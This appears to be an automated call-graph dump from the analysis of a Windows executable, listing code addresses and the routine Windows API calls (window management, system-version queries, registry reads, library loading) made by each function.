API calls 74020->74033 74020->74034 74062 47389b 74021->74062 74079 457870 7 API calls 74021->74079 74022 460848 170 API calls 74022->74018 74023->74034 74080 452548 52 API calls 74023->74080 74028 4737cf IsIconic 74024->74028 74077 47465c 8 API calls 74025->74077 74027->74034 74085 452548 52 API calls 74027->74085 74032 460848 170 API calls 74028->74032 74031 473a05 74031->74034 74039 473a0f 74031->74039 74043 4737e8 74032->74043 74038 473c21 74033->74038 74034->74022 74036 473870 SetFocus 74036->74018 74037 473afd 74037->74034 74045 473b07 74037->74045 74040 45c458 170 API calls 74038->74040 74081 431848 57 API calls 74039->74081 74046 473c32 74040->74046 74041 473889 GetParent 74041->74021 74042 47383a 74042->74048 74078 47465c 8 API calls 74042->74078 74043->74018 74076 47dfa0 71 API calls 74043->74076 74053 473b0f GetWindowDC 74045->74053 74052 45c458 170 API calls 74046->74052 74048->74034 74048->74036 74050 473a1b SaveDC 74082 4325dc 71 API calls 74050->74082 74051 473846 74051->74048 74055 473c43 74052->74055 74086 431848 57 API calls 74053->74086 74059 45c458 170 API calls 74055->74059 74057 473b32 SaveDC 74087 4325dc 71 API calls 74057->74087 74058 473a57 74083 453de8 16 API calls 74058->74083 74061 473c54 74059->74061 74066 45c458 170 API calls 74061->74066 74062->74034 74065 45c458 170 API calls 74062->74065 74063 473b68 74088 4325dc 71 API calls 74063->74088 74065->74034 74067 473c65 74066->74067 74070 45c458 170 API calls 74067->74070 74068 473a82 74084 4325dc 71 API calls 74068->74084 74072 473c76 74070->74072 74071 473a99 RestoreDC 74073 45c458 170 API calls 74072->74073 74073->74034 74075 473ba3 RestoreDC 74076->74018 74077->74042 74078->74051 74079->74041 74080->74031 74081->74050 74082->74058 74083->74068 74084->74071 74085->74037 74086->74057 74087->74063 74088->74075 74089->74034 74006 413caf 74007 413ca0 SetErrorMode 74006->74007 74090 46d040 74091 46d054 74090->74091 74093 46d08a 74090->74093 74112 41253c 74091->74112 74095 46d0f1 74093->74095 74097 46d0b9 74093->74097 74094 46d05e 74094->74093 74096 46d06f GetModuleHandleW 74094->74096 74138 46bf28 47 API calls 74095->74138 74096->74093 74098 46d07f 74096->74098 74135 46bf28 47 API calls 74097->74135 74127 409620 74098->74127 74102 46d0cd 74104 46d0ef 74102->74104 74136 4119ec 44 API calls 74102->74136 74103 46d103 ImageList_Write 74103->74104 74105 46d10d 74103->74105 74139 4119ec 44 API calls 74105->74139 74107 46d11f 74140 404a74 12 API calls 74107->74140 74110 46d0ea 74137 404a74 12 API calls 74110->74137 74141 40649c 74112->74141 74116 412571 74117 41257d GetFileVersionInfoSizeW 74116->74117 74118 412589 74117->74118 74120 4125fc 74117->74120 74119 403018 12 API calls 74118->74119 74121 412590 74119->74121 74120->74094 74122 4125b2 GetFileVersionInfoW 74121->74122 74123 4125bc VerQueryValueW 74122->74123 74124 4125d6 74122->74124 74123->74124 74125 403034 12 API calls 74124->74125 74126 4125f4 74125->74126 74126->74094 74128 409625 74127->74128 74129 409642 GetProcAddress 74128->74129 74133 40964d 74128->74133 74130 40966d 74129->74130 74131 40527c 12 API calls 74130->74131 74132 409682 74131->74132 74132->74093 74134 409665 GetProcAddress 74133->74134 74134->74130 74135->74102 74136->74110 74138->74103 74139->74107 74143 4064a0 74141->74143 74142 4064d0 74145 406eb0 74142->74145 74143->74142 74144 403034 12 API calls 74143->74144 74144->74142 74147 406e5c 74145->74147 74146 406ea9 74146->74116 74147->74146 74148 406ec0 12 API calls 74147->74148 74149 406e83 74148->74149 74149->74146 74150 403034 12 API calls 74149->74150 74150->74146 74151 480d4c 74152 480d6e 74151->74152 74163 480dac 74151->74163 74165 47f740 GetSystemDirectoryW 74152->74165 74154 480dc1 SHAutoComplete 74157 480dca 74154->74157 74155 480d76 74167 47e290 74155->74167 74158 480d81 74175 406854 74158->74175 74160 480d8e 74191 413c38 SetErrorMode 74160->74191 74163->74154 74163->74157 74164 409620 14 API calls 74164->74163 74166 47f761 74165->74166 74166->74155 74168 47e2be 74167->74168 74171 47e29a 74167->74171 74222 406448 74168->74222 74171->74168 74172 47e2ad 74171->74172 74195 406914 74172->74195 74174 47e2bb 74174->74158 74176 40685c 74175->74176 74180 40690d 74175->74180 74177 406866 74176->74177 74179 406448 74176->74179 74183 4068dd 74177->74183 74184 406871 74177->74184 74178 406498 74178->74160 74181 406468 74179->74181 74185 406ec0 12 API calls 74179->74185 74180->74160 74181->74178 74187 403034 12 API calls 74181->74187 74182 4067bc 12 API calls 74188 4068b9 74182->74188 74183->74180 74183->74182 74184->74180 74186 4067bc 12 API calls 74184->74186 74185->74181 74186->74188 74187->74178 74189 4068d8 74188->74189 74190 40527c 12 API calls 74188->74190 74189->74160 74190->74189 74244 4064d4 74191->74244 74194 413c86 74194->74163 74194->74164 74196 40691c 74195->74196 74197 4069e3 74195->74197 74196->74197 74198 406448 74196->74198 74199 406930 74196->74199 74207 40693e 74196->74207 74203 406468 74198->74203 74204 406ec0 12 API calls 74198->74204 74201 406448 12 API calls 74199->74201 74200 406498 74200->74174 74202 406854 74201->74202 74202->74198 74206 40690d 74202->74206 74209 406866 74202->74209 74203->74200 74205 403034 12 API calls 74203->74205 74204->74203 74205->74200 74206->74174 74207->74197 74208 406ec0 12 API calls 74207->74208 74212 406996 74208->74212 74210 4068dd 74209->74210 74211 406871 74209->74211 74210->74206 74213 4067bc 12 API calls 74210->74213 74211->74206 74228 4067bc 74211->74228 74214 4069ce 74212->74214 74239 4052a0 74212->74239 74217 4068b9 74213->74217 74218 406448 12 API calls 74214->74218 74220 4068d8 74217->74220 74221 40527c 12 API calls 74217->74221 74219 4069df 74218->74219 74219->74174 74220->74174 74221->74220 74223 40644c 74222->74223 74226 406468 74222->74226 74225 406ec0 12 API calls 74223->74225 74223->74226 74224 406498 74224->74158 74225->74226 74226->74224 74227 403034 12 API calls 74226->74227 74227->74224 74232 4067c9 74228->74232 74234 40682c 74228->74234 74229 40527c 12 API calls 74238 40681d 74229->74238 74230 406820 74231 406ec0 12 API calls 74230->74231 74231->74234 74232->74230 74233 4067fa 74232->74233 74243 40304c 12 API calls 74233->74243 74234->74229 74236 406802 74237 40527c 12 API calls 74236->74237 74236->74238 74237->74238 74238->74217 74240 4052a6 74239->74240 74241 4052cc 74240->74241 74242 403034 12 API calls 74240->74242 74241->74214 74242->74240 74243->74236 74245 4064d8 LoadLibraryW 74244->74245 74245->74194 74246 471a60 74247 471a69 74246->74247 74250 471fa0 74247->74250 74249 471a76 74251 472092 74250->74251 74252 471fb7 74250->74252 74251->74249 74252->74251 74271 471544 74252->74271 74255 471ff1 74257 471bb0 66 API calls 74255->74257 74256 472017 74258 471544 2 API calls 74256->74258 74259 472003 74257->74259 74260 472025 74258->74260 74263 471bb0 66 API calls 74259->74263 74261 472029 74260->74261 74262 47204f 74260->74262 74264 471bb0 66 API calls 74261->74264 74274 471bb0 74262->74274 74266 472015 74263->74266 74267 47203b 74264->74267 74266->74249 74269 471bb0 66 API calls 74267->74269 74269->74266 74287 4714c4 74271->74287 74273 471552 74273->74255 74273->74256 74275 471bd6 74274->74275 74276 471bf1 74275->74276 74277 4714c4 2 API calls 74275->74277 74278 4714c4 2 API calls 74276->74278 74277->74276 74279 471c41 74278->74279 74299 471aa8 74279->74299 74295 463a10 74287->74295 74289 4714e1 GetWindowLongW 74290 4714fe 74289->74290 74291 47151e 74289->74291 74297 471448 GetWindowLongW 74290->74297 74298 471448 GetWindowLongW 74291->74298 74294 47150a 74294->74273 74296 463a1a 74295->74296 74296->74289 74297->74294 74298->74294 74300 463a10 74299->74300 74301 471ae5 FlatSB_SetScrollProp 74300->74301 74302 471b1c 74301->74302 74303 471af3 74301->74303 74328 4e2cfe 74333 4ab630 74328->74333 74330 4e2d13 74349 4e1d8c 74330->74349 74332 4e2d37 74334 4ab63d 74333->74334 74337 4ab696 74334->74337 74357 411930 12 API calls 74334->74357 74336 4ab691 74358 404a74 12 API calls 74336->74358 74354 4ab488 74337->74354 74342 4ab6b9 74360 404a74 12 API calls 74342->74360 74343 4ab6be 74345 4ab701 74343->74345 74361 411930 12 API calls 74343->74361 74345->74330 74347 4ab6fc 74362 404a74 12 API calls 74347->74362 74367 423760 74349->74367 74351 4e1dad 74352 4e1df8 74351->74352 74373 4d70b4 74351->74373 74352->74332 74363 4ab434 74354->74363 74357->74336 74359 411930 12 API calls 74359->74342 74361->74347 74364 4ab457 74363->74364 74365 4ab446 74363->74365 74364->74343 74364->74359 74366 4ab44b InterlockedExchange 74365->74366 74366->74364 74368 42376b 74367->74368 74369 423782 74368->74369 74389 4234a0 52 API calls 74368->74389 74371 423795 74369->74371 74390 40304c 12 API calls 74369->74390 74371->74351 74377 4d70e5 74373->74377 74381 4d7130 74373->74381 74374 4d717d 74391 4ab910 74374->74391 74380 4067bc 12 API calls 74377->74380 74377->74381 74383 406448 12 API calls 74377->74383 74387 4ab910 54 API calls 74377->74387 74399 406eb8 74377->74399 74378 40527c 12 API calls 74382 4d71aa 74378->74382 74380->74377 74381->74374 74388 4ab910 54 API calls 74381->74388 74405 405d30 12 API calls 74381->74405 74406 405a64 12 API calls 74381->74406 74407 4052d0 74381->74407 74382->74351 74383->74377 74387->74377 74388->74381 74389->74369 74390->74371 74392 4ab92b 74391->74392 74395 4ab920 74391->74395 74413 4ab8b4 54 API calls 74392->74413 74394 4ab936 74394->74395 74414 411930 12 API calls 74394->74414 74395->74378 74397 4ab94b 74415 404a74 12 API calls 74397->74415 74400 406e5c 74399->74400 74401 406ec0 12 API calls 74400->74401 74402 406ea9 74400->74402 74403 406e83 74401->74403 74402->74377 74403->74402 74404 403034 12 API calls 74403->74404 74404->74402 74405->74381 74406->74381 74409 4052d4 74407->74409 74411 4052fa 74407->74411 74408 405328 74408->74381 74409->74411 74416 405368 12 API calls 74409->74416 74411->74408 74412 403034 12 API calls 74411->74412 74412->74408 74413->74394 74414->74397 74416->74411 74499 49d934 74501 49d950 74499->74501 74500 49d95a 74501->74500 74502 49da8c 74501->74502 74503 49d991 74501->74503 74502->74500 74505 482d60 12 API calls 74502->74505 74503->74500 74504 482d60 12 API calls 74503->74504 74507 49d9f4 74504->74507 74506 49daed 74505->74506 74508 49c4fc 12 API calls 74506->74508 74530 49c4fc 74507->74530 74511 49db06 74508->74511 74510 49da09 74512 482e40 12 API calls 74510->74512 74513 482e40 12 API calls 74511->74513 74521 49da13 74512->74521 74522 49db10 74513->74522 74514 49da45 74533 49a7b4 74514->74533 74515 49db40 74517 49a7b4 15 API calls 74515->74517 74518 49db67 74517->74518 74547 49c54c 12 API calls 74518->74547 74519 49da6c 74546 49c54c 12 API calls 74519->74546 74521->74514 74524 49c4fc 12 API calls 74521->74524 74528 482e40 12 API calls 74521->74528 74522->74515 74526 49c4fc 12 API calls 74522->74526 74529 482e40 12 API calls 74522->74529 74524->74521 74525 49db7f 74526->74522 74527 49da84 74528->74521 74529->74522 74531 403018 12 API calls 74530->74531 74532 49c510 74531->74532 74532->74510 74534 49c253 74533->74534 74535 49a802 74533->74535 74537 4052a0 12 API calls 74534->74537 74536 40527c 12 API calls 74535->74536 74538 49a80a 74536->74538 74539 49c270 74537->74539 74541 482d60 12 API calls 74538->74541 74540 40527c 12 API calls 74539->74540 74542 49c278 74540->74542 74543 49a816 74541->74543 74542->74519 74544 49c243 74543->74544 74548 499b0c 15 API calls 74543->74548 74544->74519 74546->74527 74547->74525 74548->74543 74417 4cc854 74418 4cc85f 74417->74418 74421 4cc658 74418->74421 74422 4cc681 74421->74422 74423 4cc6a6 74422->74423 74434 4a9acc 74422->74434 74431 4cc310 74423->74431 74428 4cc6f5 74430 4cc743 74428->74430 74441 4fa084 74428->74441 74454 4cc238 74431->74454 74433 4cc31e 74433->74430 74440 4fa028 12 API calls 74433->74440 74435 4a9add 74434->74435 74436 4a9b38 74435->74436 74437 4a9b07 MulDiv 74435->74437 74436->74423 74438 463a10 74437->74438 74439 4a9b32 SendMessageW 74438->74439 74439->74436 74440->74428 74459 493db4 74441->74459 74444 4fa11d 74446 4fa12d 74444->74446 74481 4f96d4 53 API calls 74444->74481 74445 4fa0ad 74466 482d60 74445->74466 74446->74430 74455 4cc255 GetVersion 74454->74455 74457 4cc284 74454->74457 74456 4cc262 74455->74456 74455->74457 74458 4cc26a CoCreateInstance 74456->74458 74457->74433 74458->74457 74482 4830b0 74459->74482 74461 493e50 74463 40527c 12 API calls 74461->74463 74462 493dde 74462->74461 74465 405a34 12 API calls 74462->74465 74464 493e68 74463->74464 74464->74444 74464->74445 74465->74462 74467 482d66 74466->74467 74468 403018 12 API calls 74467->74468 74469 482d98 74468->74469 74481->74446 74483 4052d0 12 API calls 74482->74483 74486 4830c1 74483->74486 74484 483101 74484->74462 74486->74484 74487 405a64 12 API calls 74486->74487 74487->74486 74549 408dce GetSystemInfo 76043 45fdfc DestroyWindow 76044 45fe2d 76043->76044 76045 45fe32 76043->76045 76047 4135bc 54 API calls 76044->76047 76047->76045 74550 50156c 74566 408f4c GetModuleHandleW 74550->74566 74556 5015d8 74579 4fe9a8 74556->74579 74567 408f7f 74566->74567 74763 404dd4 74567->74763 74570 4fe938 GetModuleHandleW 74571 409620 14 API calls 74570->74571 74572 4fe94d 74571->74572 74573 47c3e4 74572->74573 74574 47c3f3 74573->74574 74575 47c410 74573->74575 74576 47c425 74574->74576 74577 47c3fd SendMessageW 74574->74577 74578 403018 12 API calls 74575->74578 74576->74556 74577->74576 74578->74576 75285 4b0d0c 74579->75285 74581 4fe9d6 75297 40c24c 74581->75297 74583 4fe9e3 74764 404e0c 74763->74764 74767 404d6c 74764->74767 74768 404d7c 74767->74768 74769 404daf GetWindowLongW SetWindowLongW SetErrorMode 74767->74769 74768->74769 74777 408d5c 44 API calls 74768->74777 74778 4080d0 31 API calls 74768->74778 74781 5011d4 74768->74781 74793 50137c 74768->74793 74809 500b48 74768->74809 74823 4017f8 74768->74823 74827 4e69bc GetModuleHandleW 74768->74827 74841 500f88 74768->74841 74855 500df4 74768->74855 74871 5000c4 74768->74871 74937 48087c FormatMessageW 74768->74937 74769->74570 74777->74768 74778->74768 74782 5011f2 74781->74782 74783 50122a 74781->74783 74784 47f740 GetSystemDirectoryW 74782->74784 74783->74768 74785 5011ff 74784->74785 74786 47e290 12 API calls 74785->74786 74787 50120a 74786->74787 74788 406854 12 API calls 74787->74788 74789 501217 74788->74789 74790 413c38 2 API calls 74789->74790 74791 501224 74790->74791 74792 409620 14 API calls 74791->74792 74792->74783 74794 501488 74793->74794 74795 50139e 74793->74795 74794->74768 74796 4e69bc 20 API calls 74795->74796 74797 5013ad 74796->74797 74941 4e6dd4 GetVersionExW 74797->74941 74799 5013b2 74800 47f740 GetSystemDirectoryW 74799->74800 74801 50145d 74800->74801 74802 47e290 12 API calls 74801->74802 74803 501468 74802->74803 74804 406854 12 API calls 74803->74804 74805 501475 74804->74805 74806 413c38 2 API calls 74805->74806 74807 501482 74806->74807 74808 409620 14 API calls 74807->74808 74808->74794 74810 500bb9 74809->74810 74811 500b62 GetVersion 74809->74811 74810->74768 74952 469620 GetCurrentProcessId 74811->74952 75262 40178c 74823->75262 74825 401800 VirtualAlloc 74826 401817 74825->74826 74826->74768 74828 409620 14 API calls 74827->74828 74829 4e69df 74828->74829 74830 4e69e3 GetNativeSystemInfo 74829->74830 74831 4e6a48 GetSystemInfo 74829->74831 74832 409620 14 API calls 74830->74832 74834 4e6a3b 74831->74834 74833 4e69f5 74832->74833 74833->74834 74835 4e69fb GetCurrentProcess IsWow64Process 74833->74835 74834->74768 74835->74834 74836 4e6a08 74835->74836 74836->74834 74837 409620 14 API calls 74836->74837 74838 4e6a22 74837->74838 74838->74834 74839 4e6a26 GetModuleHandleW 74838->74839 74840 409620 14 API calls 74839->74840 74840->74834 74842 500fa6 74841->74842 74844 500fe3 74841->74844 75264 4b1d80 CoInitialize 74842->75264 74844->74768 74846 47f740 GetSystemDirectoryW 74847 500fb8 74846->74847 74848 47e290 12 API calls 74847->74848 74849 500fc3 74848->74849 74850 406854 12 API calls 74849->74850 74851 500fd0 74850->74851 74852 413c38 2 API calls 74851->74852 74853 500fdd 74852->74853 74854 409620 14 API calls 74853->74854 74854->74844 74856 500e18 GetModuleHandleW 74855->74856 74857 500ea3 74855->74857 74858 409620 14 API calls 74856->74858 74857->74768 74859 500e2d GetModuleHandleW 74858->74859 74860 409620 14 API calls 74859->74860 74861 500e47 74860->74861 74862 47f740 GetSystemDirectoryW 74861->74862 74863 500e71 74862->74863 74864 47e290 12 API calls 74863->74864 74865 500e7c 74864->74865 74866 406854 12 API calls 74865->74866 74867 500e89 74866->74867 74868 413c38 2 API calls 74867->74868 74869 500e96 74868->74869 74870 48087c 13 API calls 74869->74870 74870->74857 74872 5000cc 74871->74872 74873 5000f2 GetModuleHandleW GetVersion 74872->74873 74876 500303 74872->74876 74874 50010d GetProcAddress 74873->74874 74875 50012b 74873->74875 74874->74875 74879 50011e 74874->74879 74877 500133 GetProcAddress 74875->74877 74878 5002da GetProcAddress 74875->74878 74876->74768 74880 500142 74877->74880 74881 5002f0 GetProcAddress 74878->74881 74882 5002e9 74878->74882 74879->74875 75272 40a31c GetSystemDirectoryW 74880->75272 74881->74876 74883 5002ff SetProcessDEPPolicy 74881->74883 74882->74881 74883->74876 74885 500151 74886 406448 12 API calls 74885->74886 74887 50015e 74886->74887 74887->74878 74888 500196 74887->74888 74890 406854 12 API calls 74887->74890 74889 406914 12 API calls 74888->74889 74891 5001a9 74889->74891 74890->74888 75273 40a348 SetErrorMode LoadLibraryW 74891->75273 74893 5001b1 74894 406914 12 API calls 74893->74894 74895 5001c4 74894->74895 75274 40a348 SetErrorMode LoadLibraryW 74895->75274 74897 5001cc 74898 406914 12 API calls 74897->74898 74938 4808a2 74937->74938 74939 406584 12 API calls 74938->74939 74940 4808c2 74939->74940 74940->74768 74942 4e6e83 74941->74942 74943 4e6def 74941->74943 74942->74799 74943->74942 74944 4e6e1f GetVersionExW 74943->74944 74946 4e6e74 74943->74946 74944->74942 74945 4e6e3b 74944->74945 74945->74942 74946->74942 74950 4e6b68 RegOpenKeyExW RegQueryValueExW RegCloseKey 74946->74950 74948 4e6e7e 74951 4e6c44 16 API calls 74948->74951 74950->74948 74951->74942 74988 40e258 74952->74988 74955 406448 12 API calls 74956 469669 74955->74956 74957 469673 GlobalAddAtomW GetCurrentThreadId 74956->74957 74958 40e258 52 API calls 74957->74958 74959 4696ad 74958->74959 74960 406448 12 API calls 74959->74960 74961 4696ba 74960->74961 74962 4696c4 GlobalAddAtomW 74961->74962 74963 4064d4 74962->74963 75076 40e26c 74988->75076 74990 40e267 74990->74955 75077 40e275 75076->75077 75079 40e31b 75077->75079 75089 40e1b4 52 API calls 75077->75089 75080 40e3cb 75079->75080 75087 40e353 75079->75087 75081 406584 12 API calls 75080->75081 75085 40e3c9 75081->75085 75082 40e3be 75084 4067bc 12 API calls 75082->75084 75083 406448 12 API calls 75083->75087 75084->75085 75085->74990 75086 4067bc 12 API calls 75086->75087 75087->75082 75087->75083 75087->75086 75090 40e1b4 52 API calls 75087->75090 75089->75079 75090->75087 75263 40172c 75262->75263 75263->74825 75265 4b1d95 75264->75265 75266 4b1db6 75264->75266 75270 41196c 52 API calls 75265->75270 75266->74846 75268 4b1db1 75271 404a74 12 API calls 75268->75271 75270->75268 75272->74885 75273->74893 75274->74897 75286 47f29c 14 API calls 75285->75286 75289 4b0d32 75286->75289 75287 4b0d76 75288 406448 12 API calls 75287->75288 75290 4b0d80 75288->75290 75289->75287 75292 4b0d53 75289->75292 75291 406448 12 API calls 75290->75291 75294 4b0d74 75291->75294 75330 406bec 75292->75330 75294->74581 75295 4b0d63 75296 406bec 13 API calls 75295->75296 75296->75294 75298 40c250 75297->75298 75301 40c25a 75297->75301 75298->74583 75299 40c25e 75299->74583 75300 4052a0 12 API calls 75300->75299 75301->75299 75301->75300 75331 406c02 75330->75331 75332 406c75 75331->75332 75333 406c88 75331->75333 75335 406584 12 API calls 75332->75335 75337 406574 13 API calls 75333->75337 75336 406c86 75335->75336 75336->75295 75337->75336 76048 4a4ce4 76049 4a4cf2 76048->76049 76051 4a4d11 76048->76051 76049->76051 76052 4a4bc4 76049->76052 76053 4a4bf5 76052->76053 76054 45b0c8 170 API calls 76053->76054 76055 4a4c08 76054->76055 76056 406854 12 API calls 76055->76056 76057 4a4c37 GetDC 76055->76057 76056->76057 76058 430d88 21 API calls 76057->76058 76059 4a4c57 SelectObject 76058->76059 76060 4a4c68 76059->76060 76063 4a494c 76060->76063 76062 4a4c7c ReleaseDC 76062->76051 76064 4a4960 76063->76064 76065 4a4975 DrawTextW 76064->76065 76065->76062 76066 4776a8 76067 4776fd 76066->76067 76068 4776d0 76066->76068 76118 47d2c8 76067->76118 76068->76067 76070 408d5c 44 API calls 76068->76070 76072 4776e9 76070->76072 76127 411930 12 API calls 76072->76127 76073 477ca7 76075 477bf9 76073->76075 76078 477cc5 76073->76078 76074 47772c 76080 47773c 76074->76080 76081 477b9b 76074->76081 76077 4776f8 76128 404a74 12 API calls 76077->76128 76082 477ccf ShowWindow 76078->76082 76083 4777a3 76080->76083 76116 477887 76080->76116 76084 477bed 76081->76084 76133 4763fc 65 API calls 76081->76133 76082->76075 76113 4777af 76083->76113 76129 47a6fc SystemParametersInfoW 76083->76129 76084->76075 76087 477c15 76084->76087 76088 477c37 76084->76088 76089 477c2c SetWindowPos 76087->76089 76090 477c41 GetActiveWindow 76088->76090 76089->76075 76093 477c4c 76090->76093 76094 477c6a 76090->76094 76091 477ac1 76095 477acd 76091->76095 76096 477b03 76091->76096 76092 477b76 76099 477b90 ShowWindow 76092->76099 76134 470a2c 76093->76134 76097 477c70 76094->76097 76098 477c95 76094->76098 76100 477ad7 SendMessageW 76095->76100 76101 477b1d ShowWindow 76096->76101 76102 477c87 SetWindowPos SetActiveWindow 76097->76102 76103 477c9f ShowWindow 76098->76103 76099->76075 76105 463a10 76100->76105 76106 463a10 76101->76106 76102->76075 76103->76075 76107 477afb ShowWindow 76105->76107 76108 477b41 CallWindowProcW 76106->76108 76109 477b54 SendMessageW 76107->76109 76132 45b370 76108->76132 76109->76075 76111 477c59 76111->76094 76137 470d5c GetCurrentThreadId EnumThreadWindows 76111->76137 76112 477882 76112->76091 76112->76092 76113->76112 76130 474f48 52 API calls 76113->76130 76116->76112 76131 474f48 52 API calls 76116->76131 76119 47d2de 76118->76119 76125 477707 76118->76125 76120 47d341 76119->76120 76123 47d332 76119->76123 76126 47d328 IsChild 76119->76126 76138 4796d4 52 API calls 76119->76138 76140 47d228 IsWindowVisible GetWindowLongW SetWindowLongW SetWindowPos 76120->76140 76139 47d228 IsWindowVisible GetWindowLongW SetWindowLongW SetWindowPos 76123->76139 76125->76073 76125->76074 76126->76119 76126->76123 76127->76077 76129->76113 76130->76112 76131->76112 76132->76109 76133->76084 76135 470a3a 76134->76135 76136 470a47 IsIconic 76134->76136 76135->76111 76136->76111 76137->76094 76138->76119 76139->76125 76140->76125 76141 4373b0 MulDiv 76142 437402 76141->76142 76143 4373ec 76141->76143 76157 42e7bc 76142->76157 76205 43736c GetDC SelectObject GetTextMetricsW ReleaseDC 76143->76205 76146 43740e 76161 42e85c 76146->76161 76147 4373f1 76147->76142 76150 40649c 12 API calls 76147->76150 76150->76142 76152 437439 76154 437455 76152->76154 76190 42eb0c 76152->76190 76158 42e7c2 76157->76158 76159 42e85c 15 API calls 76158->76159 76160 42e7da 76159->76160 76160->76146 76162 42e883 76161->76162 76163 42e869 76161->76163 76167 42e8c0 76162->76167 76164 42e86f RegCloseKey 76163->76164 76165 42e879 76163->76165 76164->76165 76207 42e82c 14 API calls 76165->76207 76168 40649c 12 API calls 76167->76168 76169 42e8ea 76168->76169 76170 42e90a 76169->76170 76208 406cbc 76169->76208 76172 42e938 RegOpenKeyExW 76170->76172 76173 42e94a 76172->76173 76176 42e988 76172->76176 76174 42e976 76173->76174 76175 4069f8 12 API calls 76173->76175 76213 42e888 14 API calls 76174->76213 76175->76174 76178 42e9a8 RegOpenKeyExW 76176->76178 76180 42e9f5 76178->76180 76181 42e9ba 76178->76181 76179 42e983 76179->76152 76185 42ea13 RegOpenKeyExW 76180->76185 76182 42e9e6 76181->76182 76183 4069f8 12 API calls 76181->76183 76214 42e888 14 API calls 76182->76214 76183->76182 76185->76179 76186 42ea25 76185->76186 76187 42ea4e 76186->76187 76188 4069f8 12 API calls 76186->76188 76215 42e888 14 API calls 76187->76215 76188->76187 76216 42eae4 76190->76216 76205->76147 76207->76162 76209 406eb0 12 API calls 76208->76209 76211 406ccc 76209->76211 76210 406d2a 76210->76170 76211->76210 76212 4067bc 12 API calls 76211->76212 76212->76210 76213->76179 76214->76179 76215->76179 76228 42ea94 76216->76228 76218 42eaf8 76229 42eaad 76228->76229 76230 42eac1 RegQueryValueExW 76229->76230 76231 42ead8 76230->76231 76231->76218 76234 499f04 76235 499f1b MessageBoxA 76234->76235 76236 499f0d 76234->76236 76237 499f26 76235->76237 76236->76235 76236->76236 76238 425c80 76239 425ca9 76238->76239 76240 425d37 76238->76240 76242 40649c 12 API calls 76239->76242 76241 40649c 12 API calls 76240->76241 76243 425d41 76241->76243 76244 425cb3 76242->76244 76246 40649c 12 API calls 76243->76246 76245 40649c 12 API calls 76244->76245 76248 425cbd 76245->76248 76247 425d4b 76246->76247 76250 425dae CompareStringW 76247->76250 76249 425d20 CompareStringW 76248->76249 76251 425dc0 76249->76251 76250->76251 76252 472cf4 76253 472d07 76252->76253 76283 45e3d8 76253->76283 76255 472d66 76256 472ee5 76255->76256 76258 472dd5 76255->76258 76267 472dc6 MulDiv 76255->76267 76257 472efc 76256->76257 76292 45a9f0 IsIconic SetWindowPos GetWindowPlacement SetWindowPlacement 76256->76292 76260 472f13 76257->76260 76293 45aa34 IsIconic SetWindowPos GetWindowPlacement SetWindowPlacement 76257->76293 76288 473118 67 API calls 76258->76288 76261 472f4b 76260->76261 76294 472204 68 API calls 76260->76294 76264 45c458 170 API calls 76261->76264 76272 472f5c 76264->76272 76265 472dee 76265->76256 76289 472204 68 API calls 76265->76289 76287 430fd4 16 API calls 76267->76287 76268 472f39 76295 463438 52 API calls 76268->76295 76273 472e0f 76290 45ab18 MulDiv MulDiv MulDiv MulDiv 76273->76290 76275 472e22 76291 463438 52 API calls 76275->76291 76277 472e35 76278 472e41 MulDiv 76277->76278 76279 472e64 76277->76279 76278->76279 76280 472e70 MulDiv 76279->76280 76281 472e93 76279->76281 76280->76281 76281->76256 76284 45e3ea 76283->76284 76296 45a2b4 76284->76296 76286 45e402 76286->76255 76287->76258 76288->76265 76289->76273 76290->76275 76291->76277 76292->76257 76293->76260 76294->76268 76295->76261 76297 45a2d0 76296->76297 76312 42b0bc 76297->76312 76299 45a351 76299->76286 76301 45c458 170 API calls 76302 45a301 76301->76302 76303 45c458 170 API calls 76302->76303 76304 45a311 76303->76304 76305 45c458 170 API calls 76304->76305 76306 45a321 76305->76306 76307 45c458 170 API calls 76306->76307 76308 45a331 76307->76308 76309 45c458 170 API calls 76308->76309 76310 45a341 76309->76310 76311 45c458 170 API calls 76310->76311 76311->76299 76315 428098 76312->76315 76314 42b0c2 76314->76299 76314->76301 76316 4280fa 76315->76316 76319 4280ab 76315->76319 76317 428108 88 API calls 76316->76317 76318 428104 76317->76318 76318->76314 76326 428108 76319->76326 76323 4280dd 76339 4276f4 52 API calls 76323->76339 76325 4280f2 76325->76314 76328 428118 76326->76328 76329 42812e 76328->76329 76340 4286b0 76328->76340 76360 427418 76328->76360 76363 42857c 76329->76363 76332 428136 76333 427418 44 API calls 76332->76333 76334 4281a2 76332->76334 76366 427e58 76332->76366 76333->76332 76335 42857c 58 API calls 76334->76335 76337 4280d5 76335->76337 76338 42758c 54 API calls 76337->76338 76338->76323 76339->76325 76341 4292ac 58 API calls 76340->76341 76354 4286eb 76341->76354 76342 406bec 13 API calls 76342->76354 76343 428830 76384 41f508 76343->76384 76344 41f508 17 API calls 76344->76354 76347 42878f 76350 406448 12 API calls 76347->76350 76356 42879f 76350->76356 76354->76342 76354->76343 76354->76344 76354->76347 76466 428694 58 API calls 76354->76466 76358 4287db 76356->76358 76465 4277ec 58 API calls 76356->76465 76358->76328 76361 429564 44 API calls 76360->76361 76362 427422 76361->76362 76362->76328 76543 4272d0 76363->76543 76367 427e8e 76366->76367 76368 4292ac 58 API calls 76367->76368 76369 427e99 76368->76369 76370 4292ac 58 API calls 76369->76370 76371 427ea4 76370->76371 76372 427edc 76371->76372 76373 427edf 76371->76373 76374 427ed6 76371->76374 76381 427f45 76372->76381 76555 427aa4 76372->76555 76552 427c04 76373->76552 76560 427db4 57 API calls 76374->76560 76381->76332 76468 408a30 76384->76468 76386 41f52b 76485 41f454 76386->76485 76465->76358 76466->76354 76469 408a4b 76468->76469 76470 40527c 12 API calls 76469->76470 76472 408a60 76470->76472 76471 40527c 12 API calls 76473 408b37 76471->76473 76484 408b13 76472->76484 76489 405d30 12 API calls 76472->76489 76473->76386 76475 408aa2 76490 40891c WideCharToMultiByte WideCharToMultiByte 76475->76490 76477 408ae9 76478 408aef 76477->76478 76479 408b01 76477->76479 76491 405d30 12 API calls 76478->76491 76481 40527c 12 API calls 76479->76481 76484->76471 76486 41f461 76485->76486 76488 41f4e3 76485->76488 76486->76488 76489->76475 76490->76477 76544 429564 44 API calls 76543->76544 76545 4272dd 76544->76545 76546 4272f0 76545->76546 76550 429674 58 API calls 76545->76550 76546->76332 76548 4272eb 76551 427244 44 API calls 76548->76551 76550->76548 76551->76546 76560->76372 76598 481434 76599 481443 DefWindowProcW 76598->76599 76600 48143f 76598->76600 76599->76600 76601 4a6744 76604 4485c8 76601->76604 76619 45f97c 76604->76619 76606 4485da 76607 4485ef SetWindowPos 76606->76607 76608 448619 